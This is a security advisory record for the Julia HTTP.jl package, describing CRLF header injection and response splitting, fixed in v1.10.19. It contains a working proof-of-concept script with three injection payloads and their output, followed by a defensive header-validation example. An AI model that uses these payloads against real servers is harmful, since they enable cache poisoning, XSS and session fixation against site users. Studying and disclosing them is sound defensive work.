JLSEC-2025-40

Source
https://github.com/JuliaLang/SecurityAdvisories.jl/blob/main/advisories/published/2025/JLSEC-2025-40.md
Import Source
https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2025/JLSEC-2025-40.json
JSON Data
https://api.osv.dev/v1/vulns/JLSEC-2025-40
Published
2025-10-14T04:37:19.606Z
Modified
2025-11-06T22:57:16.515669Z
Summary
Header injection/Response splitting via header construction.
Details

HTTP.jl did not validate header names or values for illegal characters, so a CR/LF sequence embedded in either one terminated the current header line and began a new one, allowing CRLF-based header injection and response splitting.

```julia
using HTTP, Sockets

# Echoes whatever X-Foo header the server parsed out of the request.
function handle_index(req::HTTP.Request)
    @show HTTP.header(req, "X-Foo")
    return HTTP.Response(200, "ok")
end

# Copies the unvalidated ?to= query parameter straight into the Location header.
function handle_redirect(req::HTTP.Request)
    return HTTP.Response(301, ["Location" => get(HTTP.URIs.queryparams(req), "to", "/")], "redirect")
end

const router = HTTP.Router()
HTTP.register!(router, "GET", "/", handle_index)
HTTP.register!(router, "GET", "/redirect", handle_redirect)

server = HTTP.serve!(router, Sockets.IPv4(0,0,0,0), 8080)

println("[*] POC 1: Header injection in request through header key")
user_input = "X-Custom: x\r\nX-Foo: Bar\r\nX-Custom"
HTTP.get("http://localhost:8080/", [user_input => "hello"])

println()

println("[*] POC 2: Header injection in request through header value")
user_input = "hello\r\nX-Foo: Bar"
HTTP.get("http://localhost:8080/", ["X-Custom" => user_input])

println()

println("[*] POC 3: Header injection in response through header value")
res = HTTP.get("http://localhost:8080/redirect?to=/%0d%0aX-Foo:%20Bar", redirect=false)
@show HTTP.header(res, "X-Foo")
```

Result

```
[ Info: Listening on: 0.0.0.0:8080, thread id: 1
[*] POC 1: Header injection in request through header key
HTTP.header(req, "X-Foo") = "Bar"

[*] POC 2: Header injection in request through header value
HTTP.header(req, "X-Foo") = "Bar"

[*] POC 3: Header injection in response through header value
HTTP.header(res, "X-Foo") = "Bar"
```

Impact

This enables HTTP response splitting and header injection, leading to cache poisoning, XSS, session fixation, and more.

Patches

This issue is fixed in HTTP.jl v1.10.19.
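The following is an added example, not code from HTTP.jl or the advisory: an application-side guard that checks header names against the RFC 9110 token grammar and rejects CR/LF and other control characters in values, applied to a hardened version of the advisory's redirect handler. It assumes HTTP.jl is installed; `validate_header`, `HeaderInjection` and `handle_redirect_safe` are hypothetical names chosen here.

```julia
using HTTP

# Added example (not HTTP.jl's own code): validate headers at the call site so
# untrusted input cannot smuggle CR/LF into a header name or value. v1.10.19
# rejects such headers inside the library; older versions need this guard.

# RFC 9110 "token" characters, the only ones allowed in a header name.
const TCHAR = Set(collect("!#\$%&'*+-.^_`|~0123456789" *
                          "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"))

is_token(name::AbstractString) = !isempty(name) && all(c -> c in TCHAR, name)

# A field value may contain no control characters except HTAB; this covers
# CR, LF and NUL, the characters that split a header line.
is_field_value(value::AbstractString) = all(c -> c == '\t' || !iscntrl(c), value)

struct HeaderInjection <: Exception
    msg::String
end

# Returns the pair unchanged if it is well-formed, otherwise throws.
function validate_header(name::AbstractString, value::AbstractString)
    is_token(name) || throw(HeaderInjection("illegal header name: $(repr(name))"))
    is_field_value(value) || throw(HeaderInjection("illegal header value: $(repr(value))"))
    return name => value
end

# Hardened redirect handler (hypothetical app code): a CRLF in ?to= now yields
# a 400 instead of a split response.
function handle_redirect_safe(req::HTTP.Request)
    target = get(HTTP.URIs.queryparams(req), "to", "/")
    try
        return HTTP.Response(301, [validate_header("Location", target)], "redirect")
    catch e
        e isa HeaderInjection || rethrow()
        return HTTP.Response(400, "bad redirect target")
    end
end

# Constructed inputs mirroring the advisory's three PoCs, plus one benign pair.
for (name, value) in [("X-Custom: x\r\nX-Foo: Bar\r\nX-Custom", "hello"), # PoC 1: CRLF in key
                      ("X-Custom", "hello\r\nX-Foo: Bar"),                 # PoC 2: CRLF in value
                      ("Location", "/\r\nX-Foo: Bar"),                      # PoC 3: decoded ?to=
                      ("Location", "/account")]
    try
        validate_header(name, value)
        println("accepted: ", name, " => ", repr(value))
    catch e
        e isa HeaderInjection ? println("rejected: ", e.msg) : rethrow()
    end
end
```

Only the last pair is accepted; the three PoC pairs are rejected before any header is built.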

Credit

Chen T

Database specific
{
    "license": "CC-BY-4.0",
    "sources": [
        {
            "published": "2025-10-10T12:51:29Z",
            "url": "https://api.github.com/repos/JuliaWeb/HTTP.jl/security-advisories/GHSA-h3x8-ppwj-6vcj",
            "modified": "2025-10-10T12:51:29Z",
            "html_url": "https://github.com/JuliaWeb/HTTP.jl/security/advisories/GHSA-h3x8-ppwj-6vcj",
            "id": "GHSA-h3x8-ppwj-6vcj",
            "imported": "2025-10-14T02:22:26.408Z"
        }
    ]
}
Affected packages

Julia / HTTP

Package

Name
HTTP
Purl
pkg:julia/HTTP?uuid=cd3eb016-35fb-5094-929b-558a96fad6f3

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.10.19

Database specific

source
"https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2025/JLSEC-2025-40.json"